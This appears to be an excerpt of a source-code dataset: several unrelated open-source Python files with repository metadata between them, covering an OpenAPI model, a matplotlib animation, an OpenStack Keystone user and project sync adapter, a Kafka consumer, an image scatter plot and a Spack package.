value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
('status',): {
'AVAILABLE': "available",
'PENDING': "pending",
'SOLD': "sold",
},
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'name': (str,), # noqa: E501
'photo_urls': ([str],), # noqa: E501
'id': (int,), # noqa: E501
'category': (category.Category,), # noqa: E501
'tags': ([tag.Tag],), # noqa: E501
'status': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'name': 'name', # noqa: E501
'photo_urls': 'photoUrls', # noqa: E501
'id': 'id', # noqa: E501
'category': 'category', # noqa: E501
'tags': 'tags', # noqa: E501
'status': 'status', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, name, photo_urls, *args, **kwargs): # noqa: E501
"""pet.Pet - a model defined in OpenAPI
Args:
name (str):
photo_urls ([str]):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
id (int): [optional] # noqa: E501
category (category.Category): [optional] # noqa: E501
tags ([tag.Tag]): [optional] # noqa: E501
status (str): pet status in the store. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.name = name
self.photo_urls = photo_urls
for var_name, var_value in six.iteritems(kwargs):
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
| 37.822115
| 174
| 0.574806
|
a7739032d1cdf94e5382a387102810f690343cd4
| 775
|
py
|
Python
|
fish_ann/annimation.py
|
SamiEzz/utilities
|
e845660217e96dd9cfed45cb40a15abec450eb7f
|
[
"Apache-2.0"
] | null | null | null |
fish_ann/annimation.py
|
SamiEzz/utilities
|
e845660217e96dd9cfed45cb40a15abec450eb7f
|
[
"Apache-2.0"
] | null | null | null |
fish_ann/annimation.py
|
SamiEzz/utilities
|
e845660217e96dd9cfed45cb40a15abec450eb7f
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
k = 2*np.pi
w = 2*np.pi
dt = 0.01
xmin = 0
xmax = 3
nbx = 100
x = np.linspace(xmin, xmax, nbx)
fig = plt.figure() # initialise la figure
line, = plt.plot([],[])
plt.xlim(xmin, xmax)
plt.ylim(-1,1)
# fonction à définir quand blit=True
# crée l'arrière de l'animation qui sera présent sur chaque image
def init():
line.set_data([],[])
return line,
def animate(i):
t = i * dt
y = np.cos(k*x - w*t)
line.set_data(x, y)
return line,
#ani = animation.FuncAnimation(fig, animate, init_func=init, frames=1000, blit=True, interval=20, repeat=False)
ani = animation.FuncAnimation(fig, animate, init_func=init, blit=True, interval=20, repeat=False)
plt.show()
| 22.142857
| 111
| 0.68129
|
a84cff243f53851176c70936f087adabdbea5c64
| 30,466
|
py
|
Python
|
denbi/perun/keystone.py
|
deNBI/perunKeystoneAdapter
|
41034f337e210b5b1580042e42829eee7a5ac40c
|
[
"Apache-2.0"
] | 6
|
2018-01-18T09:11:43.000Z
|
2020-01-16T07:15:52.000Z
|
denbi/perun/keystone.py
|
deNBI/perunKeystoneAdapter
|
41034f337e210b5b1580042e42829eee7a5ac40c
|
[
"Apache-2.0"
] | 29
|
2018-02-22T07:58:28.000Z
|
2022-03-09T14:12:28.000Z
|
denbi/perun/keystone.py
|
deNBI/perunKeystoneAdapter
|
41034f337e210b5b1580042e42829eee7a5ac40c
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import itertools
import logging
import yaml
from denbi.perun.quotas import manager as quotas
from keystoneauth1.identity import v3
from keystoneauth1 import session
from keystoneclient.v3 import client
from keystoneauth1.exceptions import Unauthorized
class KeyStone:
"""
Keystone simplifies the communication with Openstack. Offers shortcuts for common functions and also
simplifies data structures returned by Keystone and offers own data structure for denbi_user and denbi_project.
Every user and every project generated by this class is marked with perun propagation auto generated flag.
denbi_user = ``{id: string, elixir_id: string, perun_id: string, email: string, enabled: boolean}``
denbi_project = ``{id: string, perun_id: string, enabled: boolean, members: [denbi_user]}``
"""
def __init__(self, environ=None, default_role="_member_",
create_default_role=False, flag="perun_propagation",
target_domain_name=None, read_only=False,
logging_domain='denbi', nested=False, cloud_admin=True):
"""
Create a new Openstack Keystone session reading clouds.yml in ~/.config/clouds.yaml
or /etc/openstack or using the system environment.
The following variables are considered:
- OS_AUTH_URL
- OS_USERNAME
- OS_PASSWORD
- OS_PROJECT_NAME
- OS_USER_DOMAIN_NAME
- OS_DOMAIN_NAME (for domain scoped access)
Instead of the system variables a "local" enviroment (a dict) can be explicitly set
:param environ: local environ used instead of system environment
:param default_role: default role used for all users (default is "_member_")
:param create_default_role: create a default role if it not exists (default is False)
:param flag: value used to mark users/projects (default is perun_propagation)
:param target_domain_name: domain where all users & projects are created, will be created if it not exists
:param read_only: do not make any changes to the keystone
:param nested: use nested projects instead of cloud/domain admin accesss
:param cloud_admin: credentials are cloud admin credentials
"""
self.ro = read_only
self.nested = nested
self.logger = logging.getLogger(logging_domain)
if cloud_admin:
# working as cloud admin requires setting a target domain
if target_domain_name is None:
raise Exception("You need to set a target domain if working with cloud admin credentials.")
# with cloud admin credentials we do not need multiple sessions
auth = self._create_auth(environ, False)
project_session = session.Session(auth=auth)
# create session
self._project_keystone = client.Client(session=project_session)
self._domain_keystone = self._project_keystone
try:
self.target_domain_id = self._project_keystone.domains.list(name=target_domain_name)[0].id
except IndexError:
raise Exception("Unknown domain {}".format(target_domain_name))
else:
# use two separate sessions for domain and project access
domain_auth = self._create_auth(environ, True)
project_auth = self._create_auth(environ, False)
domain_session = session.Session(auth=domain_auth)
project_session = session.Session(auth=project_auth)
# we have both session, now check the credentials
# by authenticating to keystone. we also need the AccessInfo
# instances to retrieve project and domain ids for later
try:
domain_access = domain_auth.get_access(domain_session)
except Unauthorized:
raise Exception("Authorization for domain session failed, wrong credentials / role?")
try:
if domain_session is not project_session:
project_access = project_auth.get_access(project_session)
else:
project_access = domain_access
except Unauthorized:
raise Exception("Authorization for project session failed, wrong credentials / role?")
# store both session for later use
self._domain_keystone = client.Client(session=domain_session)
self._project_keystone = client.Client(session=project_session)
# override the domain name if necessary
# we need to check that a correct value is given if a different
# domain is used
# TODO: the check might need to be improved if we need to differentiate
# between domain name syntax and uuid syntax
if (target_domain_name
and target_domain_name != domain_access.domain_name
and target_domain_name != domain_access.domain_id):
# valide the different domain name
# the credentials should be cloud admin credentials in this case
self.target_domain_id = self._resolve_domain(target_domain_name)
else:
if target_domain_name:
self.logger.debug("Overridden domain name is same as project domain, ignoring value.")
# use project domain
self.target_domain_id = domain_access.domain_id
self.logger.debug("Working on domain %s", self.target_domain_id)
if nested:
self.parent_project_id = project_access.project_id
self.logger.debug("Using nested project %s (id %s)",
project_access.project_name,
self.parent_project_id)
else:
self.parent_project_id = None
# Check if role exists ...
self.default_role = str(default_role)
self.default_role_id = None
for role in self.domain_keystone.roles.list():
if str(role.name) == self.default_role:
self.default_role_id = str(role.id)
break
# create it if wished
if not(self.default_role_id):
if create_default_role:
if not self.ro:
role = self.domain_keystone.roles.create(self.default_role)
self.default_role_id = str(role.id)
self.logger.debug('Created default role %s (id %s)', role.name, role.id)
else:
self.default_role_id = 'read-only'
self.logger.debug('Read-only mode, not creating default role')
else:
raise Exception("Default role %s does not exists and should not be created!" % default_role)
else:
self.logger.debug('Using existing default role %s (id %s)', default_role, self.default_role_id)
self.flag = flag
# initialize user and project map
self.denbi_user_map = {}
self.__user_id2perun_id__ = {}
self.denbi_project_map = {}
self.__project_id2perun_id__ = {}
# initialize the quota factory
self._quota_factory = quotas.QuotaFactory(project_session)
@property
def domain_keystone(self):
return self._domain_keystone
@property
def project_keystone(self):
return self._project_keystone
@property
def keystone(self, want_domain=True):
if want_domain:
return self.domain_keystone
else:
return self.project_keystone
@property
def quota_factory(self):
return self._quota_factory
def _create_auth(self, environ, auth_at_domain=False):
"""
Helper method to create the auth object for keystone, depending on the
given environment (Explicite environment, clouds.yaml or os environment
are supported.
This method supports authentication via project scoped tokens for
project and cloud admins, and domain scoped tokens for domain admins.
The auth_at_domain flag indicates which kind of authentication is
requested.
In case of project scoped tokens, the user domain name is also used
for the project if no separate project domain name is given.
:param environ: dicts to take auth information from
:param auth_at_domain: create domain scoped token
:returns: the auth object to be used for contacting keystone
"""
# default to shell environment if no specific one was given
if environ is None:
clouds_yaml_file = None
clouds_yaml_file = None
if os.path.isfile('{}/.config/clouds.yaml'.format(os.environ['HOME'])):
clouds_yaml_file = '{}/.config/clouds.yaml'.format(os.environ['HOME'])
elif os.path.isfile('/etc/openstack/clouds.yaml'):
clouds_yaml_file = '/etc/openstack/clouds.yaml'
if clouds_yaml_file:
with (open('{}/.config/clouds.yaml'.format(os.environ['HOME']))) as stream:
try:
clouds_yaml = yaml.load(stream)
environ = {}
environ['OS_AUTH_URL'] = clouds_yaml['clouds']['openstack']['auth']['auth_url']
environ['OS_USERNAME'] = clouds_yaml['clouds']['openstack']['auth']['username']
environ['OS_PASSWORD'] = clouds_yaml['clouds']['openstack']['auth']['password']
environ['OS_PROJECT_NAME'] = clouds_yaml['clouds']['openstack']['auth']['project_name']
environ['OS_USER_DOMAIN_NAME'] = clouds_yaml['clouds']['openstack']['auth']['user_domain_name']
# cloud admin
environ['OS_PROJECT_DOMAIN_NAME'] = clouds_yaml['clouds']['openstack']['auth']['project_domain_name'] if 'project_domain_name' in clouds_yaml['clouds']['openstack']['auth'] else clouds_yaml['clouds']['openstack']['auth']['user_domain_name']
# domain admin
environ['OS_DOMAIN_NAME'] = clouds_yaml['clouds']['openstack']['auth']['domain_name'] if 'domain_name' in clouds_yaml['clouds']['openstack']['auth'] else None
except Exception as e:
raise Exception("Error parsing/reading clouds.yaml (%s)." % clouds_yaml_file, e)
else:
environ = os.environ
if auth_at_domain:
# create a domain scoped token
auth = v3.Password(auth_url=environ['OS_AUTH_URL'],
username=environ['OS_USERNAME'],
password=environ['OS_PASSWORD'],
domain_name=environ['OS_DOMAIN_NAME'],
user_domain_name=environ['OS_USER_DOMAIN_NAME'])
else:
# create a project scoped token
project_domain_name = environ['OS_PROJECT_DOMAIN_NAME'] if 'OS_PROJECT_DOMAIN_NAME' in environ else environ['OS_USER_DOMAIN_NAME']
auth = v3.Password(auth_url=environ['OS_AUTH_URL'],
username=environ['OS_USERNAME'],
password=environ['OS_PASSWORD'],
project_name=environ['OS_PROJECT_NAME'],
user_domain_name=environ['OS_USER_DOMAIN_NAME'],
project_domain_name=project_domain_name)
return auth
def _resolve_domain(self, target_domain):
"""
Helper method to check whether the given domain is accessible and
to return the ID of that domain
:param target_domain: name or id of the domain to check
:returns: the keystone id of the given domain if the domain
is accessible
"""
# start by enumerating all domains the current sessions have access to
for domain in itertools.chain(self.domain_keystone.auth.domains(),
self.project_keystone.auth.domains()):
# compare domain to target and return id on match
if (domain.id == target_domain or domain.name == target_domain):
return domain.id
# no matching domain found....
raise Exception("Unknown or inaccessible domain %s" % target_domain)
def users_create(self, elixir_id, perun_id, email=None, enabled=True):
"""
Create a new user and updates internal user list
:param elixir_id: elixir_id of the user to be created
:param perun_id: perun_id of the user to be created
:param email: email of the user to be created (optional, default is None)
:param enabled: status of the user (optional, default is None)
:return: a denbi_user hash {id:string, elixir_id:string, perun_id:string, email:string, enabled: boolean}
"""
if not self.ro:
os_user = self.keystone.users.create(name=str(elixir_id), # str
domain=str(self.target_domain_id), # str
email=str(email), # str
perun_id=str(perun_id), # str
enabled=enabled, # bool
deleted=False, # bool
flag=self.flag) # str
denbi_user = {'id': str(os_user.id),
'elixir_id': str(os_user.name),
'perun_id': str(os_user.perun_id),
'enabled': bool(os_user.enabled),
'deleted': False}
if hasattr(os_user, 'email'):
denbi_user['email'] = str(os_user.email)
else:
denbi_user['email'] = str(None)
else:
# Read-only
denbi_user = {'id': 'read-only',
'elixir_id': 'read-only@elixir-europe.org',
'perun_id': perun_id,
'enabled': enabled,
'email': str(email),
'deleted': False}
self.logger.info("Create user [%s,%s,%s].", denbi_user['elixir_id'], denbi_user['perun_id'], denbi_user['id'])
self.__user_id2perun_id__[denbi_user['id']] = denbi_user['perun_id']
self.denbi_user_map[denbi_user['perun_id']] = denbi_user
return denbi_user
def users_delete(self, perun_id):
"""
Disable the user and tag it as deleted. Since it is dangerous to delete a user completly, the delete function
just disable the user and tag it as deleted. To remove an user completely use the function terminate.
:param perun_id: perunid of user to be deleted
:return:
"""
self.users_update(perun_id, enabled=False, deleted=True)
def users_terminate(self, perun_id):
"""
Delete a user
:param perun_id: perunid of user to be deleted
:return:
"""
perun_id = str(perun_id)
if perun_id in self.denbi_user_map:
denbi_user = self.denbi_user_map[perun_id]
# delete user
if not self.ro:
self.keystone.users.delete(denbi_user['id'])
self.logger.info("Terminate user [%s,%s,%s]", denbi_user['elixir_id'], denbi_user['perun_id'], denbi_user['id'])
# remove entry from map
del(self.denbi_user_map[perun_id])
else:
raise ValueError('User with perun_id %s not found in user_map' % perun_id)
def users_update(self, perun_id, elixir_id=None, email=None, enabled=None, deleted=False):
"""
Update an existing user entry.
:param elixir_id: elixir id
:param email: email
:param enabled: status
:return: the modified denbi_user hash
"""
perun_id = str(perun_id)
if perun_id in self.denbi_user_map:
denbi_user = self.denbi_user_map[perun_id]
if elixir_id is None:
elixir_id = denbi_user['elixir_id']
if email is None:
email = denbi_user['email']
if enabled is None:
enabled = denbi_user['enabled']
if not self.ro:
os_user = self.keystone.users.update(denbi_user['id'], # str
name=str(elixir_id), # str
email=str(email), # str
enabled=bool(enabled), # bool
deleted=bool(deleted)) # bool
denbi_user['elixir-id'] = str(os_user.name)
denbi_user['enabled'] = bool(os_user.enabled)
denbi_user['deleted'] = bool(os_user.deleted)
denbi_user['email'] = str(os_user.email)
self.denbi_user_map[denbi_user['perun_id']] = denbi_user
self.logger.info("Update user [%s,%s,%s] as deleted = %s", denbi_user['elixir_id'], denbi_user['perun_id'], denbi_user['id'], str(deleted))
return denbi_user
else:
raise ValueError('User with perun_id %s not found in user_map' % perun_id)
def users_map(self):
"""
Return a de.NBI user map {elixir-id -> denbi_user }
:return: a denbi_user map ``{elixir-id: {id:string, elixir_id:string, perun_id:string, email:string, enabled: boolean}}``
"""
self.denbi_user_map = {} # clear previous project list
self.__user_id2perun_id__ = {}
for os_user in self.keystone.users.list(domain=self.target_domain_id):
# consider only correct flagged user
# any other checks (like for name or perun_id are then not neccessary ...
if hasattr(os_user, "flag") and str(os_user.flag) == self.flag:
if not hasattr(os_user, 'perun_id'):
raise Exception("User ID %s should have perun_id" % (os_user.id, ))
denbi_user = {'id': str(os_user.id), # str
'perun_id': str(os_user.perun_id), # str
'elixir_id': str(os_user.name), # str
'enabled': bool(os_user.enabled), # boolean
'deleted': bool(getattr(os_user, 'deleted', False))} # boolean
# check for optional attribute email
if hasattr(os_user, 'email'):
denbi_user['email'] = str(os_user.email) # str
else:
denbi_user['email'] = str(None) # str
# create entry in maps
self.denbi_user_map[denbi_user['perun_id']] = denbi_user
self.__user_id2perun_id__[denbi_user['id']] = denbi_user['perun_id']
return self.denbi_user_map
def projects_create(self, perun_id, name=None, description=None, members=None, enabled=True):
"""
Create a new project in the admins user default domain.
:param perun_id: perun_id of the project
:param name: name of the project (optional, if not set the perun_id will be used)
:param description: description of this project (optional)
:param members: list of user id, which are members of this project
:param enabled: default True
:return: a denbi_project {id: string, perun_id: string, enabled: boolean, members: [denbi_users]}
"""
perun_id = str(perun_id)
if name is None:
name = perun_id
if not self.ro:
os_project = self.keystone.projects.create(name=str(name),
perun_id=perun_id,
domain=self.target_domain_id,
description=description,
enabled=bool(enabled),
scratched=False,
flag=self.flag,
parent=self.parent_project_id if self.nested else None)
denbi_project = {'id': str(os_project.id),
'name': str(os_project.name),
'perun_id': str(os_project.perun_id),
'description': os_project.description,
'enabled': bool(os_project.enabled),
'scratched': bool(os_project.scratched),
'members': []}
else:
denbi_project = {'id': 'read-only-fake',
'name': name,
'perun_id': perun_id,
'description': description,
'enabled': enabled,
'scratched': False,
'members': []}
self.logger.info("Create project [%s,%s].", denbi_project['perun_id'], denbi_project['id'])
self.denbi_project_map[denbi_project['perun_id']] = denbi_project
self.__project_id2perun_id__[denbi_project['id']] = denbi_project['perun_id']
# if a list of members is given append them to current project
if members:
for member in members:
self.projects_append_user(perun_id, member)
return denbi_project
def projects_update(self, perun_id, members=None, name=None,
description=None, enabled=None, scratched=False):
"""
Update a project
:param perun_id: perun_id of the project to be modified
:param members: list of perun user id
:param name:
:param description:
:param enabled:
:param scratched: - tagged for termination
:return:
"""
perun_id = str(perun_id)
add = []
rem = []
project = self.denbi_project_map[perun_id]
if (name is not None or description is not None or enabled is not None or project['scratched'] != scratched):
if name is None:
name = project['name']
if description is None:
description = project['description']
if enabled is None:
enabled = project['enabled']
if scratched:
enabled = False
if not self.ro:
self.keystone.projects.update(project['id'],
name=str(name),
description=description,
enabled=bool(enabled),
scratched=bool(scratched))
project['name'] = str(name)
project['description'] = description
project['enabled'] = bool(enabled)
project['scratched'] = bool(scratched)
self.logger.info("Update project [%s,%s].", project['perun_id'], project['id'])
# update memberslist
if members:
# search for member to be removed or added
for m in set(members) ^ set(project["members"]):
if m in project["members"]:
# members to remove
rem.append(m)
else:
# members to add
add.append(m)
for m in rem:
self.projects_remove_user(perun_id, m)
for m in add:
self.projects_append_user(perun_id, m)
def projects_delete(self, perun_id):
"""
Disable and tag project as deleted. Since it is dangerous to delete a project completly, the function just
disable the project and tag it as deleted. To remove a project from keystone use the function projects_terminate.
:param perun_id: perun_id of project to be deleted
:return:
"""
self.projects_update(perun_id, scratched=True)
def projects_terminate(self, perun_id):
"""
Terminate a tagged as deleted project. Raise an exception (ValueError) of invalid perun_id and termination
of an untagged project.
:param perun_id: perunid of project to be deleted
:return:
"""
perun_id = str(perun_id)
if perun_id in self.denbi_project_map:
# get project from map
denbi_project = self.denbi_project_map[perun_id]
if denbi_project['scratched']:
# delete project by id in keystone database
if not self.ro:
self.keystone.projects.delete(denbi_project['id'])
self.logger.info("Terminate project [%s,%s].", denbi_project['perun_id'], denbi_project['id'])
# delete project from project map
del(self.denbi_project_map[denbi_project['perun_id']])
else:
raise ValueError('Project with perun_id %s must be tagged as deleted before terminate!' % perun_id)
else:
raise ValueError('Project with perun_id %s not found in project_map!' % perun_id)
def projects_map(self):
"""
Return a map of projects
:return: a map of denbi projects ``{perun_id: {id: string, perun_id: string, enabled: boolean, members: [denbi_users]}}``
"""
self.denbi_project_map = {}
self.__project_id2perun_id_ = {}
for os_project in self.keystone.projects.list(domain=self.target_domain_id):
if hasattr(os_project, 'flag') and os_project.flag == self.flag:
self.logger.debug('Found denbi associated project %s (id %s)',
os_project.name, os_project.id)
denbi_project = {
'id': str(os_project.id), # str
'name': str(os_project.name), # str
'perun_id': str(os_project.perun_id), # str
'description': os_project.description, #
'enabled': bool(os_project.enabled), # bool
'scratched': bool(os_project.scratched), # bool
'members': []
}
# create entry in maps
self.__project_id2perun_id__[denbi_project['id']] = denbi_project['perun_id']
self.denbi_project_map[denbi_project['perun_id']] = denbi_project
# get all assigned roles for this project
# this call should be possible with domain admin right
# include_subtree is necessary since the default policies either
# allow domain role assignment querie
for role in self.keystone.role_assignments.list(project=os_project.id, include_subtree=True):
if role.user['id'] in self.__user_id2perun_id__:
self.logger.debug('Found user %s as member in project %s', role.user['id'], os_project.name)
denbi_project['members'].append(self.__user_id2perun_id__[role.user['id']])
return self.denbi_project_map
def projects_append_user(self, project_id, user_id):
"""
Append an user to a project (grant default_role to user/project
:param project_id: perun id of a project
:param user_id: perun id of an user
:return:
"""
project_id = str(project_id)
user_id = str(user_id)
# check if project/user exists
if not(project_id in self.denbi_project_map):
raise ValueError('A project with perun_id: %s does not exists!' % project_id)
if not(user_id in self.denbi_user_map):
raise ValueError('A user with perun_id: %s does not exists!' % user_id)
# get keystone id for user and project
pid = self.denbi_project_map[project_id]['id']
uid = self.denbi_user_map[user_id]['id']
if not self.ro:
self.keystone.roles.grant(role=self.default_role_id, user=uid, project=pid)
self.denbi_project_map[project_id]['members'].append(user_id)
self.logger.info("Append user %s to project %s.", user_id, project_id)
def projects_remove_user(self, project_id, user_id):
"""
Remove an user from a project (revoke default_role from user/project)
:param project_id: perun id of an project
:param user_id: could be an openstack or perun id
:return:
"""
project_id = str(project_id)
user_id = str(user_id)
# check if project/user exists
if not(project_id in self.denbi_project_map):
raise ValueError('A project with perun_id: %s does not exists!' % project_id)
if not(user_id in self.denbi_user_map):
raise ValueError('A user with perun_id: %s does not exists!' % user_id)
# get keystone id for user and project
pid = self.denbi_project_map[project_id]['id']
uid = self.denbi_user_map[user_id]['id']
if not self.ro:
self.keystone.roles.revoke(role=self.default_role_id, user=uid, project=pid)
self.denbi_project_map[project_id]['members'].remove(user_id)
self.logger.info("Remove user %s from project %s.", user_id, project_id)
def projects_memberlist(self, perun_id):
"""
Return a list of members
:param perun_id: perun id of an project
:return: Return a list of members
"""
return self.denbi_project_map[perun_id]['members']
| 44.026012
| 264
| 0.578809
|
c64d65b2d43e130ffd11994de90817ec1d7e1c4d
| 424
|
py
|
Python
|
kafka_prod/python-subscriber/src/app.py
|
RADM5TSIZE/Big_Data
|
caa3fe97fc180a89f117a10de85bf5e6e7c04d01
|
[
"Apache-2.0"
] | null | null | null |
kafka_prod/python-subscriber/src/app.py
|
RADM5TSIZE/Big_Data
|
caa3fe97fc180a89f117a10de85bf5e6e7c04d01
|
[
"Apache-2.0"
] | null | null | null |
kafka_prod/python-subscriber/src/app.py
|
RADM5TSIZE/Big_Data
|
caa3fe97fc180a89f117a10de85bf5e6e7c04d01
|
[
"Apache-2.0"
] | 1
|
2021-09-01T12:08:34.000Z
|
2021-09-01T12:08:34.000Z
|
# Install: pip3 install kafka-python
from kafka import KafkaConsumer
# The bootstrap server to connect to
bootstrap = 'my-cluster-kafka-bootstrap:9092'
# Create a comsumer instance
# cf.
print('Starting KafkaConsumer')
consumer = KafkaConsumer('big_data_demo', # <-- topics
bootstrap_servers=bootstrap)
# Print out all received messages
for msg in consumer:
print("Message Received: ", msg)
| 26.5
| 55
| 0.71934
|
a9f6d98cb1e9ab659dc1637b0172d31fa56b3e9f
| 115
|
py
|
Python
|
shake-shake_pytorch/models/__init__.py
|
ychnlgy/Chebyshev-Lagrange
|
74292e72b83f992d6c42a2f2db04dfdce5a52aea
|
[
"MIT"
] | 1
|
2021-08-19T14:28:45.000Z
|
2021-08-19T14:28:45.000Z
|
shake-shake_pytorch/models/__init__.py
|
ychnlgy/Chebyshev-Lagrange
|
74292e72b83f992d6c42a2f2db04dfdce5a52aea
|
[
"MIT"
] | null | null | null |
shake-shake_pytorch/models/__init__.py
|
ychnlgy/Chebyshev-Lagrange
|
74292e72b83f992d6c42a2f2db04dfdce5a52aea
|
[
"MIT"
] | 1
|
2022-03-11T07:20:06.000Z
|
2022-03-11T07:20:06.000Z
|
from . import polynomial
from models.shake_resnet import ShakeResNet
from models.shake_resnext import ShakeResNeXt
| 28.75
| 45
| 0.869565
|
f91e2b6cce15ff97e461aa389facc75a99c417f5
| 687
|
py
|
Python
|
var/spack/repos/builtin/packages/py-glob2/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 11
|
2015-10-04T02:17:46.000Z
|
2018-02-07T18:23:00.000Z
|
var/spack/repos/builtin/packages/py-glob2/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 22
|
2017-08-01T22:45:10.000Z
|
2022-03-10T07:46:31.000Z
|
var/spack/repos/builtin/packages/py-glob2/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 4
|
2016-06-10T17:57:39.000Z
|
2018-09-11T04:59:38.000Z
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyGlob2(PythonPackage):
"""Version of the glob module that can capture patterns
and supports recursive wildcards."""
homepage = "http://github.com/miracle2k/python-glob2/"
pypi = "glob2/glob2-0.7.tar.gz"
version('0.7', sha256='85c3dbd07c8aa26d63d7aacee34fa86e9a91a3873bc30bf62ec46e531f92ab8c')
version('0.6', sha256='f5b0a686ff21f820c4d3f0c4edd216704cea59d79d00fa337e244a2f2ff83ed6')
depends_on('py-setuptools', type='build')
| 34.35
| 93
| 0.754003
|
628a12335c07b8259147f92545d3c1563a855af3
| 1,585
|
py
|
Python
|
scatter_plot/ImageScatterPlot.py
|
myazdani/pyImagePlot
|
8b23385691cc6d6de5d5b1dccb967b0d51fd73bd
|
[
"MIT",
"Unlicense"
] | 10
|
2016-08-28T19:52:45.000Z
|
2021-04-05T04:10:37.000Z
|
scatter_plot/ImageScatterPlot.py
|
myazdani/pyImagePlot
|
8b23385691cc6d6de5d5b1dccb967b0d51fd73bd
|
[
"MIT",
"Unlicense"
] | 1
|
2019-08-30T07:17:47.000Z
|
2019-09-02T16:15:23.000Z
|
scatter_plot/ImageScatterPlot.py
|
myazdani/pyImagePlot
|
8b23385691cc6d6de5d5b1dccb967b0d51fd73bd
|
[
"MIT",
"Unlicense"
] | 5
|
2015-07-10T21:20:36.000Z
|
2020-06-05T05:12:24.000Z
|
import os
from PIL import Image, ImageDraw
from pylab import *
import csv
class ImageScatterPlot:
def __init__(self):
self.h, self.w = 20000,20000
self.resize_h = 275
self.resize_w = 275
def create_save_fig(self, image_paths, projected_features, out_file):
img_scatter = self.create_fig(image_paths, projected_features)
self.save_fig(img_scatter, out_file)
def create_fig(self, image_paths, projected_features):
img = Image.new('RGB',(self.w,self.h),(255,255,255))
draw = ImageDraw.Draw(img)
scale = abs(projected_features).max(0)
scaled = floor(array([ (p / scale) * (self.w/2-20,self.h/2-20) + (self.w/2,self.h/2) for p in projected_features]))
print "number of images", len(image_paths)
for i in range(len(image_paths)):
nodeim = Image.open(image_paths[i])
nodeim = nodeim.resize((self.resize_w,self.resize_h))
ns = nodeim.size
img.paste(nodeim,(int(scaled[i][0]-ns[0]//2),int(scaled[i][1]-ns[1]//2),int(scaled[i][0]+ns[0]//2+1),int(scaled[i][1]+ns[1]//2+1)))
return img
def save_fig(self, img, out_file):
img.save(out_file)
if __name__ == "__main__":
in_file = "PNAR-tsne-HOG-color.csv"
out_file = "res-class.jpg"
rows = []
with open(in_file, 'rb') as f:
reader = csv.reader(f)
for row in reader:
rows.append(row)
rows.pop(0)
image_paths = [row[0] for row in rows]
features = array([(float(row[1]), float(row[2])) for row in rows])
ImageScatterPlot().create_save_fig(image_paths = image_paths, projected_features = features, out_file = out_file)
| 33.723404
| 138
| 0.66877
|
e1b00566f08dfee058b8855436845e19443e6115
| 551
|
py
|
Python
|
tests/rl/settings.py
|
UIA-CAIR/Multitask
|
b0d9ac348a56c97ca7826de358bd0428c7a90992
|
[
"Unlicense"
] | 14
|
2017-12-15T01:27:40.000Z
|
2018-02-06T19:28:35.000Z
|
tests/rl/settings.py
|
UIA-CAIR/Multitask
|
b0d9ac348a56c97ca7826de358bd0428c7a90992
|
[
